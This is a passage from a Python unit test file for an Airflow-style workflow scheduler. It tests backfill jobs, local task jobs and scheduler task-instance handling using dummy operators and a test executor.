executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
Test for https://github.com/airbnb/airflow/pull/1225
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEquals(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEquals(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEquals(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEquals(State.NONE, ti1.state)
# Checks that all the Downstream tasks for Parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEquals(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for reschedule
# test for failed
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
try:
callable_path = conf.get('core', 'hostname_callable')
except (AirflowConfigException, XToolConfigException):
callable_path = None
ti.hostname = get_hostname(callable_path)
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
try:
callable_path = conf.get('core', 'hostname_callable')
except (AirflowConfigException, XToolConfigException):
callable_path = None
ti.hostname = get_hostname(callable_path)
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag()
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.ImportError).delete()
session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type directory: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
